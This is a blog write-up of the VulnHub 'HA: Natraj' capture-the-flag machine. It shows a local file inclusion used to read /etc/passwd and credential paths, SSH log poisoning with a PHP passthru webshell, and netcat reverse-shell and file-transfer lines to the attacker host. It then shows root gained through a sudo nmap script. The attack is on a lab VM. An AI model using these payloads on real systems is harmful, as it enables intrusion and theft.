5 December 2022

Pentesting Fun Stuff

following the cyber security path…

Natraj

Introduction

This is a challenge hosted on vulnhub and it’s from hackingarticles.
The description states that Nataraj is a dancing avatar of Hindu God Shiva.
His dance is called Tandava and it is only performed when he is most angry.
Whoever interrupts his dance dies by Shiva while dancing.

It’s a Boot2Root challenge, based on Nataraja.
The goal is to root the machine and find the root flag.

Let’s get started…

Enumeration

As always we start off with a port-scan to get a good view on what ports are open and what services are running behind them.

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d9:9f:da:f4:2e:67:01:92:d5:da:7f:70:d0:06:b3:92 (RSA)
|   256 bc:ea:f1:3b:fa:7c:05:0c:92:95:92:e9:e7:d2:07:71 (ECDSA)
|_  256 f0:24:5b:7a:3b:d6:b7:94:c4:4b:fe:57:21:f8:00:61 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HA:Natraj
MAC Address: 00:0C:29:AE:A6:2B (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

An SSH-server (port 22) and a web-server (port 80) are running on a Linux machine.
Because SSH needs credentials, I start with the web-server.
Time for Nikto to step in.

---------------------------------------------------------------------------
+ Target IP:          10.0.0.19
+ Target Hostname:    10.0.0.19
+ Target Port:        80
+ Start Time:         2020-06-11 20:43:57 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Server may leak inodes via ETags, header found with file /, inode: 38a1, size: 5a72f099ae180, mtime: gzip
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET 
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3268: /console/: Directory indexing found.
+ /console/: Application console found
+ 7889 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time:           2020-06-11 20:44:52 (GMT2) (55 seconds)
---------------------------------------------------------------------------
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:                     http://10.0.0.19
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.0.1
[+] Extensions:              php
[+] Follow Redir:            true
[+] Timeout:                 10s
===============================================================
2020/06/11 20:49:39 Starting gobuster
===============================================================
/images (Status: 200)
/console (Status: 200)
===============================================================
2020/06/11 20:50:30 Finished
===============================================================

Inside the folder /console/ there is an empty php file.
An UDP port-scan also give up nothing.
The only thing that has come up (without having to sift through all the images in hope there is some form of steganography) is the empty php file.
When I play a little with parameters, I get a hit.

n0w4n@lab:~/ctf/vulnhub/natraj$ curl -s http://10.0.0.19/console/file.php?cmd=../../../../../../../etc/passwd
n0w4n@lab:~/ctf/vulnhub/natraj$ curl -s http://10.0.0.19/console/file.php?file=../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
natraj:x:1000:1000:natraj,,,:/home/natraj:/bin/bash
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
mahakal:x:1001:1001:,,,:/home/mahakal:/bin/bash

A local file inclusion (LFI).
Let’s check for some interesting files.
First we create a list with all the files that maybe give some useful information.

/etc/httpd/logs/acces_log 
/etc/httpd/logs/error_log 
/var/www/logs/access_log 
/var/www/logs/access.log 
/usr/local/apache/logs/access_ log 
/usr/local/apache/logs/access. log 
/var/log/apache/access_log 
/var/log/apache2/access_log 
/var/log/apache/access.log 
/var/log/apache2/access.log
/var/log/access_log
/home/mahakal/.bash_history
/home/mahakal/.mysql_history
/home/mahakal/.my.cnf
/home/mahakal/.ssh/authorized_keys
/home/mahakal/.ssh/id_rsa
/home/mahakal/.ssh/id_rsa.keystore
/home/mahakal/.ssh/id_rsa.pub
/home/mahakal/.ssh/known_hosts

Then a for loop to iterate over them.

n0w4n@lab:~/ctf/vulnhub/natraj$ for i in $(cat list.txt); do echo -e "[-] $i:\n" && curl -s http://10.0.0.19/console/file.php?file=../../../../../../..$i; done
[-] /etc/httpd/logs/acces_log:

[-] /etc/httpd/logs/error_log:

[-] /var/www/logs/access_log:

[-] /var/www/logs/access.log:

[-] /usr/local/apache/logs/access_:

[-] log:

[-] /usr/local/apache/logs/access.:

[-] log:

[-] /var/log/apache/access_log:

[-] /var/log/apache2/access_log:

[-] /var/log/apache/access.log:

[-] /var/log/apache2/access.log:

[-] /var/log/access_log:

[-] /var/log/auth.log:

Jun  3 09:41:14 ubuntu systemd-logind[434]: New seat seat0.
Jun  3 09:41:14 ubuntu systemd-logind[434]: Watching system buttons on /dev/input/event0 (Power Button)
Jun  3 09:41:15 ubuntu sshd[457]: Server listening on 0.0.0.0 port 22.
Jun  3 09:41:15 ubuntu sshd[457]: Server listening on :: port 22.
Jun  3 09:41:15 ubuntu systemd-logind[434]: Watching system buttons on /dev/input/event1 (AT Translated Set 2 keyboard)
Jun  3 09:41:47 ubuntu sshd[612]: Accepted password for natraj from 192.168.1.103 port 49859 ssh2
Jun  3 09:41:47 ubuntu sshd[612]: pam_unix(sshd:session): session opened for user natraj by (uid=0)
Jun  3 09:41:47 ubuntu systemd-logind[434]: New session 1 of user natraj.
Jun  3 09:41:47 ubuntu systemd: pam_unix(systemd-user:session): session opened for user natraj by (uid=0)
Jun  3 09:41:59 ubuntu sudo:   natraj : TTY=pts/0 ; PWD=/home/natraj ; USER=root ; COMMAND=/bin/bash
Jun  3 09:41:59 ubuntu sudo: pam_unix(sudo:session): session opened for user root by natraj(uid=0)
Jun  3 09:42:01 ubuntu CRON[680]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun  3 09:42:01 ubuntu CRON[680]: pam_unix(cron:session): session closed for user root
Jun  3 09:43:01 ubuntu CRON[684]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun  3 09:43:01 ubuntu CRON[684]: pam_unix(cron:session): session closed for user root
Jun  3 09:43:48 ubuntu sshd[612]: pam_unix(sshd:session): session closed for user natraj
Jun  3 09:43:48 ubuntu sudo: pam_unix(sudo:session): session closed for user root
Jun  3 09:43:48 ubuntu systemd-logind[434]: Removed session 1.
Jun  3 09:44:01 ubuntu CRON[695]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun  3 09:44:01 ubuntu CRON[695]: pam_unix(cron:session): session closed for user root
Jun 11 13:38:36 ubuntu systemd-logind[441]: New seat seat0.
Jun 11 13:38:36 ubuntu systemd-logind[441]: Watching system buttons on /dev/input/event0 (Power Button)
Jun 11 13:38:36 ubuntu sshd[473]: Server listening on 0.0.0.0 port 22.
Jun 11 13:38:36 ubuntu sshd[473]: Server listening on :: port 22.
Jun 11 13:38:37 ubuntu systemd-logind[441]: Watching system buttons on /dev/input/event1 (AT Translated Set 2 keyboard)
Jun 11 13:39:01 ubuntu CRON[704]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 11 13:39:01 ubuntu CRON[705]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 11 13:39:01 ubuntu CRON[704]: pam_unix(cron:session): session closed for user root
Jun 11 13:39:01 ubuntu CRON[705]: pam_unix(cron:session): session closed for user root
Jun 11 13:40:01 ubuntu CRON[799]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 11 13:40:01 ubuntu CRON[799]: pam_unix(cron:session): session closed for user root
Jun 11 13:41:01 ubuntu CRON[802]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 11 13:41:01 ubuntu CRON[802]: pam_unix(cron:session): session closed for user root
Jun 11 13:41:29 ubuntu sshd[805]: Did not receive identification string from 10.0.0.12 port 54986
Jun 11 13:41:37 ubuntu sshd[806]: Protocol major versions differ for 10.0.0.12 port 55014: SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3 vs. SSH-1.5-NmapNSE_1.0
Jun 11 13:41:37 ubuntu sshd[807]: Protocol major versions differ for 10.0.0.12 port 55016: SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3 vs. SSH-1.5-Nmap-SSH1-Hostkey
Jun 11 13:41:37 ubuntu sshd[808]: Unable to negotiate with 10.0.0.12 port 55028: no matching host key type found. Their offer: ssh-dss [preauth]
Jun 11 13:41:37 ubuntu sshd[810]: Connection closed by 10.0.0.12 port 55038 [preauth]
Jun 11 13:41:37 ubuntu sshd[812]: Connection closed by 10.0.0.12 port 55044 [preauth]
Jun 11 13:41:37 ubuntu sshd[814]: Unable to negotiate with 10.0.0.12 port 55050: no matching host key type found. Their offer: ecdsa-sha2-nistp384 [preauth]
Jun 11 13:41:37 ubuntu sshd[816]: Unable to negotiate with 10.0.0.12 port 55054: no matching host key type found. Their offer: ecdsa-sha2-nistp521 [preauth]
Jun 11 13:41:37 ubuntu sshd[818]: Connection closed by 10.0.0.12 port 55056 [preauth]
Jun 11 13:42:01 ubuntu CRON[820]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 11 13:42:01 ubuntu CRON[820]: pam_unix(cron:session): session closed for user root

..[SNIP]..

Jun 11 14:30:01 ubuntu CRON[1080]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 11 14:30:01 ubuntu CRON[1080]: pam_unix(cron:session): session closed for user root
[-] /home/mahakal/.bash_history:

[-] /home/mahakal/.mysql_history:

[-] /home/mahakal/.my.cnf:

[-] /home/mahakal/.ssh/authorized_keys:

[-] /home/mahakal/.ssh/id_rsa:

[-] /home/mahakal/.ssh/id_rsa.keystore:

[-] /home/mahakal/.ssh/id_rsa.pub:

[-] /home/mahakal/.ssh/known_hosts:

Looks like I can view the auth.log file.
Maybe something called ‘log poisoning’ is possible.
Log Poisoning is a common technique we can use to gain a reverse shell from the LFI vulnerability.
To make this work we need to inject malicious input to the server log (in this case auth.log).
If all goes well PHP will evaluate the input and the inclusion of a malformed file would be evaluated too.
If we control the contents of a file available on the vulnerable web application, we could insert PHP code and load the file over the LFI vulnerability to execute our code.

First let’s poison the log.

n0w4n@lab:~/ctf/vulnhub/natraj$ ssh '<?php passthru($_GET['cmd']); ?>'@10.0.0.19
The authenticity of host '10.0.0.19 (10.0.0.19)' can't be established.
ECDSA key fingerprint is SHA256:LvUVmGWIYBfaqxlxouyJwlU19DzRO0Y9dMcBclxz1zU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.0.0.19' (ECDSA) to the list of known hosts.
<?php passthru($_GET[cmd]); ?>@10.0.0.19's password: 
Permission denied, please try again.

To make life a bit more easy, I run the LFI command not with cURL, but in the browser after I started Burpsuite in intercept mode.
After Burpsuite intercepts the request, I transfer the request to the repeater in Burpsuite.

To make use of the log poison, I add a small piece to the request and run it inside the repeater.

Jun 11 14:40:26 ubuntu sshd[1174]: Failed password for invalid user uid=33(www-data) gid=33(www-data) groups=33(www-data)

Now that I know I can execute a command, it’s time to get a reverse shell.

Not working with Python, let’s try Bash.

Not working with Bash, Let’s try Netcat (the version without -e option).

n0w4n@lab:~/ctf/vulnhub/natraj$ nc -lvp 9999
listening on [any] 9999 ...
10.0.0.19: inverse host lookup failed: Host name lookup failure
connect to [10.0.0.12] from (UNKNOWN) [10.0.0.19] 47450
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

And this one works.

$ python -c 'import pty;pty.spawn("/bin/bash");'
/bin/sh: 3: python: not found
$ python3 -c 'import pty;pty.spawn("/bin/bash");'
www-data@ubuntu:/var/www/html/console$

Maybe the first try would have succeeded if I used python3.
But access is access…..so who cares.

Time to do some recon on the system.

www-data@ubuntu:/var/www/html/console$ ls -lah /home       
ls -lah /home
total 16K
drwxr-xr-x  4 root    root    4.0K Jun  3 05:36 .
drwxr-xr-x 22 root    root    4.0K Jun  3 04:18 ..
drwxr-xr-x  2 mahakal mahakal 4.0K Jun  3 05:43 mahakal
drwxr-xr-x  4 natraj  natraj  4.0K Jun  3 09:34 natraj
www-data@ubuntu:/var/www/html/console$ ls -lah /home/mahakal
ls -lah /home/mahakal
total 24K
drwxr-xr-x 2 mahakal mahakal 4.0K Jun  3 05:43 .
drwxr-xr-x 4 root    root    4.0K Jun  3 05:36 ..
-rw------- 1 mahakal mahakal    1 Jun  3 09:38 .bash_history
-rw-r--r-- 1 mahakal mahakal  220 Jun  3 05:36 .bash_logout
-rw-r--r-- 1 mahakal mahakal 3.7K Jun  3 05:36 .bashrc
-rw-r--r-- 1 mahakal mahakal  807 Jun  3 05:36 .profile
www-data@ubuntu:/var/www/html/console$ ls -lah /home/natraj
ls -lah /home/natraj
total 36K
drwxr-xr-x 4 natraj natraj 4.0K Jun  3 09:34 .
drwxr-xr-x 4 root   root   4.0K Jun  3 05:36 ..
-rw------- 1 root   root    109 Jun  3 09:43 .bash_history
-rw-r--r-- 1 natraj natraj  220 Jun  3 04:20 .bash_logout
-rw-r--r-- 1 natraj natraj 3.7K Jun  3 04:20 .bashrc
drwx------ 2 natraj natraj 4.0K Jun  3 04:47 .cache
drwx------ 3 natraj natraj 4.0K Jun  3 09:30 .gnupg
-rw-r--r-- 1 natraj natraj  807 Jun  3 04:20 .profile
-rw-r--r-- 1 root   root     66 Jun  3 09:34 .selected_editor
-rw-r--r-- 1 natraj natraj    0 Jun  3 04:47 .sudo_as_admin_successful

– no interesting files with the SUID bit set
– no files with interesting capabilities
– no mails
– no interesting user owned files
– yes an interesting worldwritable config file

www-data@ubuntu:/home/mahakal$ find / -perm -0007 -type f 2>/dev/null
find / -perm -0007 -type f 2>/dev/null
/etc/apache2/apache2.conf

I need to change the file, but there is no vim or nano and vi is working like rubbish.
So best thing is to transfer it to my local machine.

www-data@ubuntu:/var/www/html/console$ nc -w3 10.0.0.12 9998 < /etc/apache2/apache2.conf
n0w4n@lab:~/ctf/vulnhub/natraj$ nc -lvp 9998 > apache2.conf
listening on [any] 9998 ...
10.0.0.19: inverse host lookup failed: Host name lookup failure
connect to [10.0.0.12] from (UNKNOWN) [10.0.0.19] 55408

The small change I make is here:

# These need to be set in /etc/apache2/envvars
User ${APACHE_RUN_USER}
Group ${APACHE_RUN_GROUP}
User mahakal
Group mahakal

I added the user mahakal to the file.

Why? Apache is normally configured to only have access to its DocumentRoot directory and not to run any system commands.
As such, the Apache process normally runs as an unprivileged user with no shell access in most platforms (www-data).
This is for security reasons as even an exploit to a poorly written PHP or Perl script will not escalate and cause much harm to the system.

Now to get the file back.
For this I use the python3 http server module.

Now to reboot the machine. And because of the restricted privileges I can’t make use of any options to gracefully shut down this server.
Luckely it’s an VM I controle, but this is a thing if the machine was running outside of my reach.

When I reboot the VM, start up the same listener as before and run the same exploit as before (the one in Burpsuite), I get again a reverse shell.
But this time as user mahakal.

n0w4n@lab:~/ctf/vulnhub/natraj$ nc -lvp 9999
listening on [any] 9999 ...
10.0.0.19: inverse host lookup failed: Host name lookup failure
connect to [10.0.0.12] from (UNKNOWN) [10.0.0.19] 34526
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash");'
mahakal@ubuntu:/var/www/html/console$

Let’s check if this user has any superpowers:

mahakal@ubuntu:/home/mahakal$ sudo -l
sudo -l
Matching Defaults entries for mahakal on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mahakal may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/bin/nmap

Running nmap with root level permission.

This is never a good idea, because according to GTFObins there is a way to escalate privileges this way.
Nmap has the ability to run scripts during its scanning process.
Those scripts can come from anywhere.
In this case we’re going to create our own script, that will spawn a system shell, and let nmap execute it.
Normally this isn’t a big deal if nmap runs with the permissions of an unprivileged user.
In this case it runs under root…..so you can see where this is going.

mahakal@ubuntu:/home/mahakal$ TF=$(mktemp)
TF=$(mktemp)
mahakal@ubuntu:/home/mahakal$ echo 'os.execute("/bin/sh")' > $TF
echo 'os.execute("/bin/sh")' > $TF
mahakal@ubuntu:/home/mahakal$ sudo /usr/bin/nmap --script=$TF
sudo /usr/bin/nmap --script=$TF

Starting Nmap 7.60 ( https://nmap.org ) at 2020-06-12 02:50 PDT
NSE: Warning: Loading '/tmp/tmp.NTgHr3ciVw' -- the recommended file extension is '.nse'.
# id
uid=0(root) gid=0(root) groups=0(root)

And there we have a root shell.
Now for the final piece.

uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt



███▄▄▄▄      ▄████████     ███        ▄████████    ▄████████      ▄█ 
███▀▀▀██▄   ███    ███ ▀█████████▄   ███    ███   ███    ███     ███ 
███   ███   ███    ███    ▀███▀▀██   ███    ███   ███    ███     ███ 
███   ███   ███    ███     ███   ▀  ▄███▄▄▄▄██▀   ███    ███     ███ 
███   ███ ▀███████████     ███     ▀▀███▀▀▀▀▀   ▀███████████     ███ 
███   ███   ███    ███     ███     ▀███████████   ███    ███     ███ 
███   ███   ███    ███     ███       ███    ███   ███    ███     ███ 
 ▀█   █▀    ███    █▀     ▄████▀     ███    ███   ███    █▀  █▄ ▄███ 
                                     ███    ███              ▀▀▀▀▀▀  


!! Congrats you have finished this task !!		
							
Contact us here:						
								
Hacking Articles : https://twitter.com/rajchandel/
Geet Madan : https://www.linkedin.com/in/geet-madan/		
													
+-+-+-+-+-+ +-+-+-+-+-+-+-+					
 |E|n|j|o|y| |H|A|C|K|I|N|G|			
 +-+-+-+-+-+ +-+-+-+-+-+-+-+						
__________________________________

And that’s it.

Conclusion

This was a fun challenge to do.
There were some points I didn’t like, such as the need to physically reboot the VM to make the exploit work.
Like I already mentioned, this can become a problem if this VM is not in your physical reach.
I did like the log poisoning and the way to get RCE.

Overal it was a good challenge and can offer new features for pentesters to learn.
Keep up the good work!!!

 

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.